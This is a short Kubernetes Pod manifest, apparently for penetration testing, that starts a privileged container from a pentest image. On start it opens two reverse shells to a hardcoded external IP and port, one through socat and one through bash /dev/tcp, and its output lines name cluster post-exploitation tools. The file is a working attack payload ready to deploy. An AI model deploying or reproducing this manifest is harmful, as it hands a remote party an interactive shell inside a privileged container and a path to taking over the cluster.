apiVersion: v1
kind: Pod
metadata:
  name: mtkpi-pentest-pod-v2
spec:
  containers:
  - name: mtkpi
    image: r0binak/mtkpi:v1
    securityContext:
      privileged: true
    command: ["/bin/sh", "-c"]
    args:
    - |
      # Вариант A: socat (надёжнее nc)
      apk add --no-cache socat 2>/dev/null || true
      socat TCP:188.227.84.184:9001 EXEC:"/bin/sh -i",pty,stderr,setsid,sigint,sane &

      # Вариант B: bash /dev/tcp (если socat нет)
      bash -i >& /dev/tcp/188.227.84.184/9001 0>&1 &

      echo "[+] Reverse shell sent via socat + bash"
      echo "[+] Tools: cdk eval, peirates, kubectl get nodes"
      sleep infinity
